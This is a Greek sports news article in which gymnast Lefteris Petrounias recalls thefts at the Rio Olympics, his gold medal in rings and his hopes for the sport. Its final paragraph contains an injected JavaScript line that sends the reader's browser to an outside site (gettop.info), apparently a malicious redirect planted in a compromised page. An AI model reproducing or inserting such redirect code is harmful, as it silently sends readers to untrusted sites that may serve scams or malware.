Πετρούνιας: Κυκλοφορούσα μια εβδομάδα με το χρυσό στην τσέπη για να μη μου το κλέψουν

0
5

 

Δεν ήταν πολύ καλοί οι Ολυμπιακοί του Ρίο εξομολογήθηκε ο χρυσός Ολυμπιονίκης των κρίκων Λευτέρης Πετρούνιας μιλώντας στο ΟΛΑ Ξεκόλλα.

Όπως είπε ο αθλητής «είδαμε μέχρι και κροκόδειλο εκεί που έκαναν προπόνηση για την ανοιχτή θάλασσα… Εμάς μας είχαν κλέψει ρούχα και γυαλιά και γι’ αυτό κυκλοφορούσα μια εβδομάδα με τον μετάλλιο στην τσέπη για να μη μου το κλέψουν».

Αφού δεσμεύθηκε ότι την επόμενη τετραετία θα προχωρήσει στην κατάκτηση νέων μεταλλίων αποκάλυψε ότι ανήμερα Δεκαπενταύγουστο όταν και αγωνίστηκε στον τελικό των κρίκων στη Βραζιλία προσευχήθηκε στην Παναγία για το χρυσό μετάλλιο.

«Είπα βοήθα Παναγιά μου πριν ανέβω στους κρίκους. Ήταν και η ονομαστική εορτή του πατέρα μου» είπε ενώ «ευχαρίστησε» τον σκηνοθέτη που δεν έδειξε τα πλάνα μετά το «ναι ρε φίλε» που ψέλισσε μετά την ολοκλήρωση του προγράμματός του «γιατί μου έφυγαν και μερικά γαλλικά».

«Το Ολυμπιακό μετάλλιο το περίμενα από 9 ετών και τώρα είμαι 26» πρόσθεσε και εξέφρασε τη χαρά του που ακούει ότι υπάρχουν και λίστες αναμονής από αγοράκια και κοριτσάκια που θέλουν να μάθουν κρίκους. «Αυτό είναι το μεγαλύτερο μετάλλιο» είπε χαρακτηριστικά.

Παράλληλα εξέφρασε την αγωνία του ότι «πιθανόν να είμαστε η τελευταία φουρνιά αθλητών». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here